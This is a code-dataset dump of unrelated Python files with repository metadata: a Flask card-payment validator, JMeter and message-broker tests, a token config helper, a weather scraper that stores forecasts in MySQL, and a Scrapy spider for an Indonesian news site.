21716b55e61aaab71c09221c686d96dab513e84d | 2,984 | py | Python | app/models/payments.py | StartFuture/workstation-backend | 3b88946a3a7e2c9449de938d008a665fc4a17d34 | [
"MIT"
] | 1 | 2022-03-20T23:55:34.000Z | 2022-03-20T23:55:34.000Z | app/models/payments.py | StartFuture/workstation-backend | 3b88946a3a7e2c9449de938d008a665fc4a17d34 | [
"MIT"
] | 1 | 2022-03-10T19:26:53.000Z | 2022-03-10T19:26:53.000Z | app/models/payments.py | StartFuture/workstation-backend | 3b88946a3a7e2c9449de938d008a665fc4a17d34 | [
"MIT"
] | 1 | 2022-03-08T21:40:51.000Z | 2022-03-08T21:40:51.000Z | import re
from flask_restful import Resource, reqparse
# Card-brand detection patterns, keyed by brand name.
# NOTE: the original values were JavaScript-style "/.../" literals; those
# delimiters are not part of Python `re` syntax and made every match fail,
# so they have been removed here.
acceptedCreditCards = {
    "visa": r"^4[0-9]{12}(?:[0-9]{3})?$",
    "mastercard": r"^5[1-5][0-9]{14}$|^2(?:2(?:2[1-9]|[3-9][0-9])|[3-6][0-9][0-9]|7(?:[01][0-9]|20))[0-9]{12}$",
    "amex": r"^3[47][0-9]{13}$",
    "discover": r"^65[4-9][0-9]{13}|64[4-9][0-9]{13}|6011[0-9]{12}|(622(?:12[6-9]|1[3-9][0-9]|[2-8][0-9][0-9]|9[01][0-9]|92[0-5])[0-9]{10})$",
    "diners_club": r"^3(?:0[0-5]|[68][0-9])[0-9]{11}$",
    "jcb": r"^(?:2131|1800|35[0-9]{3})[0-9]{11}$",
}
def validate_card(card_number):
    """Classify a card number against the known brand patterns.

    :param card_number: the card number as a string of digits.
    :return: ``[True, brand_name]`` when exactly one brand pattern matches,
             ``[False, None]`` when none or several match.

    Fixes over the original: ``re.match`` was called as
    ``re.match(card_number, pattern)`` — the arguments were swapped, so no
    card could ever match — and ``name`` could be referenced before
    assignment when nothing matched.
    """
    match_count = 0
    matched_brand = None
    for brand, pattern in acceptedCreditCards.items():
        # strip("/") tolerates legacy JavaScript-style "/.../" delimiters.
        if re.match(pattern.strip("/"), card_number):
            match_count += 1
            matched_brand = brand
    if match_count == 1:
        return [True, matched_brand]
    return [False, None]
def validate_cvv(cvv):
    """Return True for a 3- or 4-digit CVV, else False.

    The value is validated as text so leading zeros are preserved: the
    previous ``int()`` round-trip turned ``"099"`` into ``"99"`` and
    wrongly rejected it.
    """
    digits = str(cvv).strip()
    return digits.isdigit() and len(digits) in {3, 4}
def validate_name(name):
    """Return True when *name* consists solely of ASCII letters and spaces."""
    letters_and_spaces = r"^[A-Za-z ]+$"
    return re.match(letters_and_spaces, name) is not None
def validate_due_date(date):
    """Validate a dd/mm/yyyy date (also '-' or '.' separated), including
    month lengths and leap-year handling for 29 February.

    Fix: the original pattern was a triple-quoted string whose literal
    newlines and indentation became part of the regex, so it could never
    match anything. The fragments are now joined by implicit string
    concatenation, reconstructing the intended single-line pattern.
    """
    regex_date = (
        r"^(?:(?:31(\/|-|\.)(?:0?[13578]|1[02]))\1|"
        r"(?:(?:29|30)(\/|-|\.)(?:0?[1,3-9]|1[0-2])\2))"
        r"(?:(?:1[6-9]|[2-9]\d)?\d{2})$"
        r"|^(?:29(\/|-|\.)0?2\3(?:(?:(?:1[6-9]|[2-9]\d)"
        r"?(?:0[48]|[2468][048]|[13579][26])|(?:(?:16|[2468][048]|"
        r"[3579][26])00))))$"
        r"|^(?:0?[1-9]|1\d|2[0-8])(\/|-|\.)(?:(?:0?[1-9])|(?:1[0-2]))\4"
        r"(?:(?:1[6-9]|[2-9]\d)?\d{2})$"
    )
    return bool(re.match(regex_date, date))
class Payments(Resource):
    """REST resource validating card payment details sent by the client."""

    @staticmethod
    def post():
        """Validate the submitted card fields, failing on the first invalid one.

        Validation order (unchanged): card number, CVV, due date, holder name.
        """
        parser = reqparse.RequestParser()
        parser.add_argument('nome')
        parser.add_argument('num_card')
        parser.add_argument('cvv')
        parser.add_argument('data')
        payload = parser.parse_args()

        card_ok, card = validate_card(payload['num_card'])
        if not card_ok:
            return {
                'msg': 'number card error'
            }
        if not validate_cvv(payload['cvv']):
            return {
                'msg': 'cvv error'
            }
        if not validate_due_date(payload['data']):
            return {
                'msg': 'date error'
            }
        if not validate_name(payload['nome']):
            return {
                'msg': 'name error'
            }
        return {
            'msg': 'sucessfull payment',
            'card': card
        }
21731e6d861a39649ea198c473c43e6a73b5f540 | 2,916 | py | Python | jmeter_api/configs/http_cache_manager/test_http_cache_manager.py | dashawn888/jmeter_api | 1ab5b02f3a7c8ad1b84fc50db4fe1fc2fa7c91bd | [
"Apache-2.0"
] | 11 | 2020-03-22T13:30:21.000Z | 2021-12-25T06:23:44.000Z | jmeter_api/configs/http_cache_manager/test_http_cache_manager.py | dashawn888/jmeter_api | 1ab5b02f3a7c8ad1b84fc50db4fe1fc2fa7c91bd | [
"Apache-2.0"
] | 37 | 2019-12-18T13:12:50.000Z | 2022-02-10T10:52:37.000Z | jmeter_api/configs/http_cache_manager/test_http_cache_manager.py | dashawn888/jmeter_api | 1ab5b02f3a7c8ad1b84fc50db4fe1fc2fa7c91bd | [
"Apache-2.0"
] | 5 | 2019-12-06T10:55:56.000Z | 2020-06-01T19:32:32.000Z | import xmltodict
import pytest
from jmeter_api.configs.http_cache_manager.elements import HTTPCacheManager
from jmeter_api.basics.utils import tag_wrapper
class TestHTTPCacheManagerArgs:
    """Constructor argument validation for HTTPCacheManager."""

    class TestClearCacheEachIteration:
        def test_check(self):
            """A string is rejected as the boolean flag."""
            with pytest.raises(TypeError):
                HTTPCacheManager(clear_each_iteration="False")

        def test_check2(self):
            """An integer is rejected as the boolean flag."""
            with pytest.raises(TypeError):
                HTTPCacheManager(clear_each_iteration=123456)

        def test_positive(self):
            """A genuine bool is stored unchanged."""
            manager = HTTPCacheManager(clear_each_iteration=True)
            assert manager.clear_each_iteration is True

    class TestUseCacheControl:
        def test_check(self):
            """A string is rejected as the boolean flag."""
            with pytest.raises(TypeError):
                HTTPCacheManager(use_cache_control="False")

        def test_check2(self):
            """An integer is rejected as the boolean flag."""
            with pytest.raises(TypeError):
                HTTPCacheManager(use_cache_control=12345)

        def test_positive(self):
            """A genuine bool is stored unchanged."""
            manager = HTTPCacheManager(use_cache_control=False)
            assert manager.use_cache_control is False

    class TestMaxElementsInCache:
        def test_check(self):
            """A non-numeric string is rejected as the cache size."""
            with pytest.raises(TypeError):
                HTTPCacheManager(max_elements_in_cache="test")

        def test_check2(self):
            """A numeric string (not an int) is rejected as the cache size."""
            with pytest.raises(TypeError):
                HTTPCacheManager(max_elements_in_cache="120")

        def test_positive(self):
            """A genuine int is stored unchanged."""
            manager = HTTPCacheManager(max_elements_in_cache=100)
            assert manager.max_elements_in_cache == 100
class TestHTTPCacheManagerRender:
    """XML rendering of a fixed reference HTTPCacheManager."""

    @staticmethod
    def _rendered():
        """Render the reference manager and return the parsed XML document."""
        manager = HTTPCacheManager(clear_each_iteration=False,
                                   use_cache_control=True,
                                   max_elements_in_cache=100)
        return xmltodict.parse(tag_wrapper(manager.to_xml(), 'result'))

    def test_clear_each_iteration(self):
        doc = self._rendered()
        assert doc['result']['CacheManager']['boolProp'][0]['#text'] == 'false'

    def test_use_cache_control(self):
        doc = self._rendered()
        assert doc['result']['CacheManager']['boolProp'][1]['#text'] == 'true'

    def test_max_elements_in_cache(self):
        doc = self._rendered()
        assert doc['result']['CacheManager']['intProp']['#text'] == '100'
| 39.405405 | 86 | 0.645405 | 2,754 | 0.944444 | 0 | 0 | 0 | 0 | 0 | 0 | 183 | 0.062757 |
21749d76cf64e34fef78fa86bc1d6551d9be27aa | 1,533 | py | Python | main/configuration/token_config.py | anderswodenker/sams-app | d9ab3474a5b1f009afe803d14484c000059b61c3 | [
"MIT"
] | null | null | null | main/configuration/token_config.py | anderswodenker/sams-app | d9ab3474a5b1f009afe803d14484c000059b61c3 | [
"MIT"
] | 1 | 2020-12-10T14:40:57.000Z | 2020-12-10T14:40:57.000Z | main/configuration/token_config.py | anderswodenker/sams-app | d9ab3474a5b1f009afe803d14484c000059b61c3 | [
"MIT"
] | null | null | null | import configparser
import mapping
from main.helper.time_helper import get_token_time
class TokenConfig:
    """Thin wrapper around the token section of the INI file at
    ``mapping.token_config`` (all options live in the DEFAULT section)."""

    def __init__(self):
        """Load the token configuration from disk."""
        self.config = configparser.ConfigParser()
        # Live view of the DEFAULT section; it reflects the read() below.
        self.config_data = self.config['DEFAULT']
        self.config.read(mapping.token_config)

    def read_token(self):
        """Re-read the file and return token, issue time and lifetime."""
        self.config.read(mapping.token_config)
        section = self.config['DEFAULT']
        return {
            "token": section['token'],
            "last_token": section['last_token'],
            "expires_in": section['expires_in'],
        }

    def read_token_error(self):
        """Re-read the file and return the stored token error message."""
        self.config.read(mapping.token_config)
        return self.config_data['token_error']

    def write_token(self, token, expires_in):
        """Store a fresh token with its issue time and lifetime, then persist."""
        updates = (("token", token),
                   ("last_token", get_token_time()),
                   ("expires_in", expires_in))
        for option, value in updates:
            self.config.set("DEFAULT", option, value)
        self.write_config()

    def write_token_error(self, error):
        """Record the last token-related error message, then persist."""
        self.config.set("DEFAULT", "token_error", error)
        self.write_config()

    def reset_token(self):
        """Blank out the token, its timestamp and its lifetime, then persist."""
        for option in ("token", "last_token", "expires_in"):
            self.config.set("DEFAULT", option, "")
        self.write_config()

    def write_config(self):
        """Best-effort write of the config back to disk."""
        try:
            with open(mapping.token_config, 'w') as configfile:
                self.config.write(configfile)
        except IOError:
            # Deliberately swallow write failures (original behavior).
            pass
21758ae5b904cd586ad12411253dc0f4bd9495ef | 350 | py | Python | tests/data/dos.py | granrothge/multiphonon | 486a998eeb6b73b964a58ba0f98fe3ece15bdf6e | [
"MIT"
] | 1 | 2019-05-22T08:46:09.000Z | 2019-05-22T08:46:09.000Z | tests/data/dos.py | granrothge/multiphonon | 486a998eeb6b73b964a58ba0f98fe3ece15bdf6e | [
"MIT"
] | 118 | 2016-04-04T12:27:15.000Z | 2021-08-18T01:46:13.000Z | tests/data/dos.py | granrothge/multiphonon | 486a998eeb6b73b964a58ba0f98fe3ece15bdf6e | [
"MIT"
] | 5 | 2017-09-28T16:01:12.000Z | 2020-01-31T18:58:09.000Z | #!/usr/bin/env python
#
# Jiao Lin <jiao.lin@gmail.com>
import os
# Directory containing this module; the bundled data files (e.g. V-dos.dat)
# are expected to live alongside it.
datadir = os.path.abspath(os.path.dirname(__file__))
def loadDOS():
    """Read the bundled vanadium DOS file and return the ``(E, g)`` pair
    produced by ``nice_dos``."""
    from multiphonon.dos import io
    from multiphonon.dos.nice import nice_dos
    dos_path = os.path.join(datadir, 'V-dos.dat')
    E, Z, error = io.fromascii(dos_path)
    return nice_dos(E, Z)
# End of file
| 19.444444 | 52 | 0.66 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 77 | 0.22 |
217837f8dc006967d37900044e0628322b10a71d | 5,832 | py | Python | weather/Weather.py | Eajay/chatting-bot-with-tasks | d02299cb9d84da719eec4950a69484058adc791a | [
"MIT"
] | null | null | null | weather/Weather.py | Eajay/chatting-bot-with-tasks | d02299cb9d84da719eec4950a69484058adc791a | [
"MIT"
] | null | null | null | weather/Weather.py | Eajay/chatting-bot-with-tasks | d02299cb9d84da719eec4950a69484058adc791a | [
"MIT"
] | null | null | null | from scrapy.crawler import CrawlerProcess
from scrapy.utils.project import get_project_settings
import re
import pymysql
import geocoder
import datetime
import os
class Weather:
    """Scrape a weather forecast page, parse it with regexes, and cache the
    rows in a MySQL ``weather`` table keyed by date.

    NOTE(review): scrapy's CrawlerProcess.start() normally runs only once per
    process (Twisted reactor restriction), so renew_table() is effectively
    single-shot — confirm before calling it again on the same instance.
    """

    def __init__(self, host, user, passwd, db, port):
        """Connect to MySQL with the given credentials, then crawl, parse and
        build the table immediately via :meth:`renew_table`."""
        settings_file_path = 'weather.weather.settings'  # The path seen from root, ie. from main.py
        os.environ.setdefault('SCRAPY_SETTINGS_MODULE', settings_file_path)
        self.process = CrawlerProcess(get_project_settings())
        # Rough geolocation of this machine's IP, used only in the reply text.
        self.location = geocoder.ip('me').address
        self.date = datetime.date.today()
        self.text = ""
        self.data = {}
        self.conn = pymysql.connect(host=host, user=user, passwd=passwd, db=db, port=port)
        self.cursor = self.conn.cursor()
        self.renew_table()

    def renew_table(self):
        """Run the full pipeline: crawl the page, parse it, rebuild the table."""
        self._get_web_page()
        self._get_data()
        self._create_sql_table()

    def _get_web_page(self):
        """Run the 'weather' spider and load the resulting HTML into self.text."""
        self.process.crawl('weather')
        self.process.start()
        self.filename = 'weather.html'
        with open(self.filename, 'r') as f:
            data = f.readlines()
        self.text = ' '.join(data)

    def _get_data(self):
        """Regex-scrape the forecast fields out of self.text into self.data.

        Each value is a list indexed by forecast day; the lists are assumed
        to be parallel (same length) — TODO confirm against the source page.
        """
        dic = {}
        # description
        description = re.findall(r'<td class="twc-sticky-col" headers="day" title=(.*?) data-track-string', self.text)
        description = [val[1:-1] for val in description]  # strip surrounding quotes
        dic['description'] = description
        # day_time
        day_time = re.findall(r'<span class="date-time">(.*?)</span>', self.text)
        dic['day_time'] = day_time
        # day_detail
        day_detail = re.findall(r'<span class="day-detail clearfix">(.*?)</span>', self.text)
        dic['day_detail'] = day_detail
        # simple_description
        simple_description = re.findall(r'<td class="description".*?<span>(.*?)</span></td>', self.text)
        dic['simple_description'] = simple_description
        # highest and lowest temperature: each pattern has two alternatives,
        # so findall yields 2-tuples with exactly one non-empty member.
        highest_temperature = re.findall(
            r'<div><span>(.*?)</span><span class="slash"|<div><span class="">(.*?)<sup>°</sup></span><span class="slash"',
            self.text)
        lowest_temperature = re.findall(
            r'"slash"></span><span class="">(.*?)<sup>°</sup></span></div>|"slash"></span><span>(.*?)</span></div>',
            self.text)
        for i, val in enumerate(highest_temperature):
            highest_temperature[i] = val[0] if val[0] else val[1]
        for i, val in enumerate(lowest_temperature):
            lowest_temperature[i] = val[0] if val[0] else val[1]
        dic['highest_temperature'] = highest_temperature
        dic['lowest_temperature'] = lowest_temperature
        # precip
        precip = re.findall(r'icon-drop-1"></span><span class=""><span>(.*?)<span', self.text)
        dic['precip'] = precip
        # wind
        wind = re.findall(r'"wind"><span class="">(.*?)</span></td>', self.text)
        dic['wind'] = wind
        # humidity
        humidity = re.findall(r'"humidity"><span class=""><span>(.*?)<span', self.text)
        dic['humidity'] = humidity
        self.data = dic

    def _create_sql_table(self):
        """Drop and recreate the ``weather`` table, then insert the parsed rows.

        Uses parameterized queries for the inserts: the scraped text can
        contain quotes, which broke the previous %-formatted SQL strings and
        also left them open to SQL injection.
        """
        self.cursor.execute('SHOW TABLES')
        if ('weather',) in self.cursor:
            self.cursor.execute('DROP TABLE weather')
            self.conn.commit()
        sql_create = ("CREATE TABLE weather(date varchar(32) NOT NULL, date_week TEXT, "
                      "description TEXT, simple_description TEXT, highest_temp TEXT, "
                      "lowest_temp TEXT, precip TEXT, wind TEXT, humidity TEXT, "
                      "PRIMARY KEY(date))")
        self.cursor.execute(sql_create)
        self.conn.commit()
        sql_insert = ("INSERT INTO weather (date, date_week, description, simple_description, "
                      "highest_temp, lowest_temp, precip, wind, humidity) "
                      "values(%s, %s, %s, %s, %s, %s, %s, %s, %s)")
        for i in range(len(self.data['day_detail'])):
            row = (self.data['day_detail'][i], self.data['day_time'][i],
                   self.data['description'][i], self.data['simple_description'][i],
                   self.data['highest_temperature'][i], self.data['lowest_temperature'][i],
                   self.data['precip'][i], self.data['wind'][i], self.data['humidity'][i])
            # Placeholders let the driver quote/escape each value safely.
            self.cursor.execute(sql_insert, row)
        self.conn.commit()

    def _transfer_date(self, value):
        """Convert a date to the 'MMM D' key format used by the table.

        ctime() pads single-digit days with an extra space ('Sun Mar  1 ...'),
        which makes split(' ') yield an empty token — hence the branch.
        """
        temp = value.ctime().split(' ')
        if temp[2] == '':
            return temp[1].upper() + ' ' + temp[3]
        return temp[1].upper() + ' ' + temp[2]

    def select_data(self, content):
        """Return a one-line forecast for today, or for tomorrow when the
        word 'tomorrow' appears anywhere in *content*."""
        if 'tomorrow' in content:
            date = self._transfer_date(value=self.date + datetime.timedelta(days=1))
            prefix = "Tomorrow in "
        else:
            date = self._transfer_date(value=self.date)
            prefix = "Today in "
        # Parameterized lookup (was %-formatted; see _create_sql_table).
        self.cursor.execute("SELECT description from weather WHERE date = %s", (date,))
        rows = self.cursor.fetchall()
        return prefix + self.location + " : " + rows[0][0]
# host = 'localhost'
# user = 'root'
# passwd = '123456'
# db = 'mydb'
# port = 3306
# w = Weather(host=host, user=user, passwd=passwd, db=db, port=port)
# print(w.select_data(content='today'))
| 38.368421 | 479 | 0.573217 | 5,449 | 0.934008 | 0 | 0 | 0 | 0 | 0 | 0 | 2,036 | 0.348989 |
21784a3d87f08299948e420bf102a93e46449e8b | 7,578 | py | Python | tests/test_networks/test_brokers/test_publishers/test_producers.py | Clariteia/minos_microservice_networks | 77f239429653272c5cb3447311513143f8521ed9 | [
"MIT"
] | 7 | 2021-04-12T15:40:11.000Z | 2022-03-04T13:46:01.000Z | tests/test_networks/test_brokers/test_publishers/test_producers.py | Clariteia/minos_microservice_networks | 77f239429653272c5cb3447311513143f8521ed9 | [
"MIT"
] | 275 | 2021-04-03T09:23:40.000Z | 2022-01-28T11:56:25.000Z | tests/test_networks/test_brokers/test_publishers/test_producers.py | Clariteia/minos_microservice_networks | 77f239429653272c5cb3447311513143f8521ed9 | [
"MIT"
] | null | null | null | import asyncio
import unittest
from asyncio import (
gather,
sleep,
)
from unittest.mock import (
AsyncMock,
call,
)
from uuid import (
uuid4,
)
import aiopg
from minos.common import (
NotProvidedException,
)
from minos.common.testing import (
PostgresAsyncTestCase,
)
from minos.networks import (
BrokerConsumer,
BrokerMessageStatus,
BrokerMessageStrategy,
BrokerProducer,
BrokerPublisher,
)
from tests.utils import (
BASE_PATH,
FakeModel,
)
class TestProducer(PostgresAsyncTestCase):
CONFIG_FILE_PATH = BASE_PATH / "test_config.yml"
def setUp(self) -> None:
super().setUp()
self.consumer = BrokerConsumer.from_config(self.config)
self.producer = BrokerProducer.from_config(self.config, consumer=self.consumer)
async def asyncSetUp(self):
await super().asyncSetUp()
await self.consumer.setup()
await self.producer.setup()
async def asyncTearDown(self):
await self.producer.destroy()
await self.consumer.destroy()
await super().asyncTearDown()
def test_from_config_default(self):
self.assertIsInstance(self.producer, BrokerProducer)
async def test_from_config_raises(self):
with self.assertRaises(NotProvidedException):
BrokerProducer.from_config(config=self.config)
async def test_dispatch_one_internal_true(self):
mock = AsyncMock()
self.consumer.enqueue = mock
ok = await self.producer.dispatch_one((0, "GetOrder", bytes(), BrokerMessageStrategy.UNICAST))
self.assertTrue(ok)
self.assertEqual(1, mock.call_count)
self.assertEqual(call("GetOrder", -1, bytes()), mock.call_args)
async def test_dispatch_one_internal_false(self):
self.producer.consumer = None
publish_mock = AsyncMock()
self.producer.publish = publish_mock
ok = await self.producer.dispatch_one((0, "GetOrder", bytes(), BrokerMessageStrategy.UNICAST))
self.assertTrue(ok)
self.assertEqual(1, publish_mock.call_count)
self.assertEqual(call("GetOrder", bytes()), publish_mock.call_args)
async def test_dispatch_one_external_true(self):
mock = AsyncMock()
self.producer.publish = mock
ok = await self.producer.dispatch_one((0, "GetProduct", bytes(), BrokerMessageStrategy.UNICAST))
self.assertTrue(ok)
self.assertEqual(1, mock.call_count)
self.assertEqual(call("GetProduct", bytes()), mock.call_args)
async def test_dispatch_one_external_true_event(self):
mock = AsyncMock()
self.producer.publish = mock
ok = await self.producer.dispatch_one((0, "TicketAdded", bytes(), BrokerMessageStrategy.MULTICAST))
self.assertTrue(ok)
self.assertEqual(1, mock.call_count)
self.assertEqual(call("TicketAdded", bytes()), mock.call_args)
async def test_dispatch_one_external_false(self):
self.producer.publish = AsyncMock(return_value=False)
ok = await self.producer.dispatch_one((0, "GetOrder", bytes(), BrokerMessageStrategy.MULTICAST))
self.assertFalse(ok)
async def test_publish_true(self):
ok = await self.producer.publish(topic="TestKafkaSend", message=bytes())
self.assertTrue(ok)
async def test_publish_false(self):
self.producer.client.send_and_wait = AsyncMock(side_effect=ValueError)
ok = await self.producer.publish(topic="TestKafkaSend", message=bytes())
self.assertFalse(ok)
async def test_dispatch_forever(self):
mock = AsyncMock(side_effect=ValueError)
self.producer.dispatch = mock
try:
await gather(self.producer.dispatch_forever(), self._notify("producer_queue"))
except ValueError:
pass
self.assertEqual(1, mock.call_count)
async def test_dispatch_forever_without_notify(self):
mock_dispatch = AsyncMock(side_effect=[None, ValueError])
mock_count = AsyncMock(side_effect=[1, 0, 1])
self.producer.dispatch = mock_dispatch
self.producer._get_count = mock_count
try:
await self.producer.dispatch_forever(max_wait=0.01)
except ValueError:
pass
self.assertEqual(2, mock_dispatch.call_count)
self.assertEqual(3, mock_count.call_count)
async def test_concurrency_dispatcher(self):
model = FakeModel("foo")
identifier = uuid4()
broker_publisher = BrokerPublisher.from_config(config=self.config)
async with broker_publisher:
for x in range(60):
await broker_publisher.send(
model, "CommandBroker-Delete", identifier=identifier, reply_topic="TestDeleteReply"
)
async with aiopg.connect(**self.broker_queue_db) as connect:
async with connect.cursor() as cur:
await cur.execute("SELECT COUNT(*) FROM producer_queue")
records = await cur.fetchone()
assert records[0] == 60
await asyncio.gather(*(self.producer.dispatch() for _ in range(6)))
async with aiopg.connect(**self.broker_queue_db) as connect:
async with connect.cursor() as cur:
await cur.execute("SELECT COUNT(*) FROM producer_queue")
records = await cur.fetchone()
assert records[0] == 0
async def test_if_commands_was_deleted(self):
async with BrokerPublisher.from_config(config=self.config) as broker_publisher:
await broker_publisher.send(FakeModel("Foo"), "TestDeleteReply")
await broker_publisher.send(FakeModel("Foo"), "TestDeleteReply")
await self.producer.dispatch()
async with aiopg.connect(**self.broker_queue_db) as connection:
async with connection.cursor() as cursor:
await cursor.execute("SELECT COUNT(*) FROM producer_queue WHERE topic = '%s'" % "TestDeleteReply")
self.assertEqual(0, (await cursor.fetchone())[0])
async def test_if_commands_retry_was_incremented(self):
model = FakeModel("foo")
identifier = uuid4()
async with BrokerPublisher.from_config(config=self.config) as broker_publisher:
await broker_publisher.send(
model, "TestDeleteOrderReply", identifier=identifier, status=BrokerMessageStatus.SUCCESS
)
await broker_publisher.send(
model, "TestDeleteOrderReply", identifier=identifier, status=BrokerMessageStatus.SUCCESS
)
self.producer.publish = AsyncMock(return_value=False)
await self.producer.dispatch()
async with aiopg.connect(**self.broker_queue_db) as connection:
async with connection.cursor() as cursor:
await cursor.execute("SELECT COUNT(*) FROM producer_queue WHERE topic = 'TestDeleteOrderReply'")
self.assertEqual(2, (await cursor.fetchone())[0])
await cursor.execute("SELECT retry FROM producer_queue WHERE id=1;")
self.assertEqual(1, (await cursor.fetchone())[0])
await cursor.execute("SELECT retry FROM producer_queue WHERE id=2;")
self.assertEqual(1, (await cursor.fetchone())[0])
async def _notify(self, name):
await sleep(0.2)
async with aiopg.connect(**self.broker_queue_db) as connect:
async with connect.cursor() as cur:
await cur.execute(f"NOTIFY {name!s};")
if __name__ == "__main__":
unittest.main()
| 35.246512 | 114 | 0.662048 | 7,025 | 0.927026 | 0 | 0 | 0 | 0 | 6,525 | 0.861045 | 642 | 0.084719 |
217c49f0f1aaaa2893f92203a3e95b9ea7c76395 | 4,489 | py | Python | text_collector/spiders/sumut_go.py | gusman/web-crawler | d7a41cab2ce82d0e6b0daf5db05944381f0a4bbd | [
"MIT"
] | null | null | null | text_collector/spiders/sumut_go.py | gusman/web-crawler | d7a41cab2ce82d0e6b0daf5db05944381f0a4bbd | [
"MIT"
] | null | null | null | text_collector/spiders/sumut_go.py | gusman/web-crawler | d7a41cab2ce82d0e6b0daf5db05944381f0a4bbd | [
"MIT"
] | null | null | null | import scrapy
import datetime
import re
from datetime import timedelta
from scrapy.spiders import CrawlSpider, Rule
from scrapy.linkextractors import LinkExtractor
class ItemNews(scrapy.Item):
    """One scraped news article: publication date, headline, and body text."""
    date = scrapy.Field()
    title = scrapy.Field()
    content = scrapy.Field()
class SultraZonaSpider(scrapy.Spider):
    """Walks gosumut.com's per-day news index backwards in time, yielding a
    request for every listed article, and stops after ``max_empty``
    consecutive empty index pages.

    NOTE(review): a non-empty index page yields only article requests and no
    follow-up index request, so the date walk effectively continues only
    through empty pages — confirm this is the intended crawl behavior.
    """
    max_empty = 3       # consecutive empty index pages tolerated before stopping
    counter_empty = 0
    name = "sumut_go"
    allowed_domains = [ 'gosumut.com' ]
    start_urls = [
        'https://www.gosumut.com/news-index/?indexDate=29&indexMonth=03&indexYear=2020&Submit=Tampilkan'
        # 'https://www.gosumut.com/news-index/?indexDate=20&indexMonth=11&indexYear=2015&Submit=Tampilkan'
    ]

    def get_date_from_url(self, url):
        """Extract the (year, month, day) strings from an index-page URL."""
        result = re.search('indexDate=[0-9]{2}', url)
        result = re.search('[0-9]{2}', result.group(0))
        date_d = result.group(0)

        result = re.search('indexMonth=[0-9]{2}', url)
        result = re.search('[0-9]{2}', result.group(0))
        date_m = result.group(0)

        result = re.search('indexYear=[0-9]{4}', url)
        result = re.search('[0-9]{4}', result.group(0))
        date_y = result.group(0)

        self.logger.info('\n >> date text: [%s/%s/%s]\n', date_y, date_m, date_d)
        return date_y, date_m, date_d

    def construct_page_url_by_date(self, date_str):
        """Build an index-page URL from a 'YYYY/MM/DD' string."""
        l_str = date_str.split('/')
        date_y, date_m, date_d = str(l_str[0]), str(l_str[1]), str(l_str[2])
        url = "https://www.gosumut.com/news-index/?indexDate=" + date_d + "&indexMonth=" + date_m + "&indexYear=" + date_y + "&Submit=Tampilkan"
        return url

    def parse(self, response):
        """ Retrieve article list """
        self.logger.info('\n >> PROCESSING in parse %s\n', response.url)

        n_news = len(response.xpath('//div[@class="newslist"]//a'))
        #next_url = response.xpath('//i[@class="td-icon-menu-right"]/ancestor::a/@href').get()
        next_url = None
        date_y, date_m, date_d = self.get_date_from_url(response.url)

        self.logger.info('\n >> n_news : %d\n', n_news)
        self.logger.info('\n >> %s, %s, %s\n', date_y, date_m, date_d)

        if n_news > 0:
            # A non-empty page resets the streak (to 1, not 0 — original quirk).
            self.counter_empty = 1
            # Scrape every article linked from this index page.
            news_urls = response.xpath('//div[@class="newslist"]//a/@href')
            for news_url in news_urls:
                url = news_url.get()
                url = "https://www.gosumut.com" + url
                self.logger.info('\n >> PROCESSING in scrapy request %s\n', url)
                yield scrapy.Request(url, callback=self.parse_news_page)
        else:
            self.logger.info("\n >> Found empty page, counter_empty: %d\n", self.counter_empty)
            self.counter_empty += 1
            # Use the declared class constant instead of a duplicated literal.
            if self.counter_empty < self.max_empty:
                self.logger.info('\n >> next url : %s\n', next_url)
                if next_url is None:
                    # No pagination link: step back one calendar day instead.
                    curr_date = datetime.datetime(int(date_y), int(date_m), int(date_d))
                    prev_date = curr_date - timedelta(days=1)
                    prev_date_str = prev_date.strftime("%Y/%m/%d")

                    self.logger.info('\n >> Retrieved date %s/%s/%s\n', date_y, date_m, date_d)
                    self.logger.info('\n >> Previous date %s\n', prev_date_str)

                    next_url = self.construct_page_url_by_date(prev_date_str)
                    self.logger.info('\n >> PROCESSING in scrapy request %s\n', next_url)
                    yield scrapy.Request(next_url, callback=self.parse)
                else:
                    yield scrapy.Request(next_url, callback=self.parse)
            else:
                self.logger.info("\n >> Reach end of index page : counter_empty: %d\n", self.counter_empty)

    def parse_news_page(self, response):
        """Extract one article's title, date and cleaned body text."""
        self.logger.info('>> PROCESSING in parse_detail %s\n', response.url)
        item = ItemNews()
        item['title'] = response.xpath('//div[@class="news-box-view" and @itemprop="articleBody"]/h1/text()').get()
        item['date'] = response.xpath('//div[@class="time"]/text()').get().strip()
        content = response.xpath('//div[@class="news-content"]//text()[parent::p or parent::strong or parent::div[@class="news-box-desc-right"]]').getall()
        # Drop whitespace-only fragments, then flatten line breaks to spaces.
        content = [c.strip() for c in content if c.strip()]
        content = [c.replace("\r\n", " ") for c in content]
        content = [c.replace("\n", " ") for c in content]
        item['content'] = "".join(content)
        yield item
| 45.343434 | 155 | 0.58699 | 4,321 | 0.962575 | 2,900 | 0.646024 | 0 | 0 | 0 | 0 | 1,350 | 0.300735 |
217d30de43b0686c9b6a097430ce64fd2cb78174 | 130 | py | Python | test/conftest.py | eliasbrange/aws-cdk-template | 7ba7bc921bdd9c0064a6a661a2f47ee767ed70cc | [
"MIT"
] | 2 | 2022-01-03T11:11:32.000Z | 2022-03-11T16:34:51.000Z | test/conftest.py | eliasbrange/aws-cdk-template | 7ba7bc921bdd9c0064a6a661a2f47ee767ed70cc | [
"MIT"
] | null | null | null | test/conftest.py | eliasbrange/aws-cdk-template | 7ba7bc921bdd9c0064a6a661a2f47ee767ed70cc | [
"MIT"
] | 1 | 2022-03-25T20:35:16.000Z | 2022-03-25T20:35:16.000Z | import os.path as op
import sys
# Make the project's src/ directory importable from the test suite.
src_dir = op.join(op.dirname(op.realpath(__file__)), "..", "src")
path = op.abspath(src_dir)
sys.path.append(path)
| 21.666667 | 74 | 0.7 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 | 0.069231 |
217d4e0e9bc044b34a21ee15c3e1def8c727534c | 3,599 | py | Python | addons/stock_landed_costs/models/account_move.py | SHIVJITH/Odoo_Machine_Test | 310497a9872db7844b521e6dab5f7a9f61d365a4 | [
"Apache-2.0"
] | null | null | null | addons/stock_landed_costs/models/account_move.py | SHIVJITH/Odoo_Machine_Test | 310497a9872db7844b521e6dab5f7a9f61d365a4 | [
"Apache-2.0"
] | null | null | null | addons/stock_landed_costs/models/account_move.py | SHIVJITH/Odoo_Machine_Test | 310497a9872db7844b521e6dab5f7a9f61d365a4 | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
